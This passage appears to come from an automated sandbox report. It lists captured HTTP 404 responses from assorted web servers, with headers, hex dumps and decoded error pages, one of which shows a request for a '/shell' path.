73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:46 GMTServer: ApacheLast-Modified: Tue, 26 Apr 2016 09:34:13 GMTETag: "1e5-5315ffef9ef40;570b1133f6f80"Accept-Ranges: bytesContent-Length: 485Vary: Accept-EncodingKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 20 69 64 3d 22 61 22 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 77 65 62 64 65 66 61 75 6c 74 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 20 69 64 3d 22 62 22 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 69 64 3d 22 63 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 22 3e 42 61 63 6b 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 77 65 62 64 65 66 61 75 6c 74 2f 6a 73 2f 6c 6f 63 61 6c 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 77 65 62 64 65 66 61 75 6c 74 2f 6a 73 2f 65 72 72 6f 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head> <meta charset="utf-8"> <title id="a">The page is not found</title> <style>body{display:none;}</style> <link rel="stylesheet" type="text/css" href="/webdefault/css/error.css"></head><body> <h1 id="b">Sorry, the page you are looking for is not found.</h1> <button id="c" onclick="history.go(-1)">Back</button> <script src="/webdefault/js/locale.js"></script> <script src="/webdefault/js/error.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Fri, 18 Dec 2009 03:14:03 GMTServer: lighttpd/1.4.39Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:46 GMTServer: ApacheContent-Type: text/htmlContent-Length: 1Vary: Accept-EncodingKeep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 20 Data Ascii:
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cacheX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINContent-Type: text/htmlContent-Length: 345Date: Tue, 19 Jul 2022 11:08:30 GMTServer: lighttpd/1.4.37Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:49 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:08:49 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 19 Jul 2022 11:08:51 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:08:52 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:08:54 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 19 Jul 2022 11:08:56 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:09 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:56 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 967Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 2f 64 65 73 69 67 6e 2e 63 73 73 22 3e 0d 0a 09 3c 2f 68 65 61 64 3e 0d 0a 09 3c 62 6f 64 79 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0d 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 22 3e 0d 0a 09 09 09 09 3c 69 6d 67 20 73 74 79 6c 65 3d 22 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 34 30 30 70 78 3b 22 20 73 72 63 3d 22 2f 65 72 72 6f 72 2f 6c 6f 67 6f 2e 70 6e 67 22 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 5f 68 65 61 64 22 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 3e 0d 0a 09 09 09 09 09 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 09 09 09 09 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 5f 69 6e 66 6f 22 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 3e 0d 0a 09 09 09 09 09 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 56 6c 6c 74 20 68 61 6e 64 65 6c 74 20 65 73 20 73 69 63 68 20 75 6d 20 65 69 6e 20 61 6c 74 65 73 20 4c 65 73 65 7a 65 69 63 68 65 6e 20 6f 64 65 72 20 65 69 6e 65 6e 20 75 6d 20 65 69 6e 65 6e 20 6e 69 63 68 74 20 67 c3 bc 6c 74 69 67 65 6e 20 4c 69 6e 6b 2e 20 4c c3 b6 73 63 68 65 6e 20 53 69 65 20 69 68 72 65 6e 20 43 61 63 68 65 20 75 6e 64 20 64 69 65 20 67 65 73 70 65 69 63 68 65 72 74 65 6e 20 0d 0a 09 09 09 09 09 4c 65 73 65 7a 65 69 63 68 65 6e 2e 20 44 61 6e 61 63 68 20 72 75 66 65 6e 20 53 69 65 20 64 69 65 20 53 65 69 74 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 77 77 77 2e 70 6f 77 65 72 2d 64 6f 67 2e 65 75 22 3e 77 77 77 2e 70 6f 77 65 72 2d 64 6f 67 2e 65 75 3c 2f 61 3e 20 65 72 6e 65 75 74 20 61 75 66 2e 0d 0a 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 54 68 65 20 73 70 65 63 69 66 69 65 64 20 70 61 67 65 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 49 74 20 6d 61 79 20 62 65 20 61 6e 20 6f 6c 64 20 62 6f 6f 6b 6d 61 72 6b 20 6f 72 20 61 6e 20 69 6e 76 61 6c 69 64 20 6c 69 6e 6b 2e 20 44 65 6c 65 74 65 20 79 6f 75 72 20 63 61 63 68 65 20 61 6e 64 20 74 68 65 20 73 61 76 65 64 20 6f 6e 65 73 0d 0a 09 09 09 09 09 42 6f 6f 6b 6d 61 72 6b 2e 20 54 68 65 6e 20 67 6f 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 77 77 77 2e 70 6f 77 65 72 2d 64 6f 67 2e 65 75 22 3e 77 77 77 2e 70 6f 77 65 72 2d 64 6f 67 2e 65 75 3c 2f 61 3e 20 61 67 61 69 6e 2e 0d 0a 09 09 09 09 3c 2f 73 70 61 6e 3e
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:56 GMTServer: Apache/2.4.51 (Debian)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Debian) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveTransfer-Encoding: chunked
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 04:57:50 GMTServer: webCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 19 Jul 2022 11:08:56 GMTContent-Type: text/htmlContent-Length: 3650Connection: keep-aliveETag: "616e0979-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 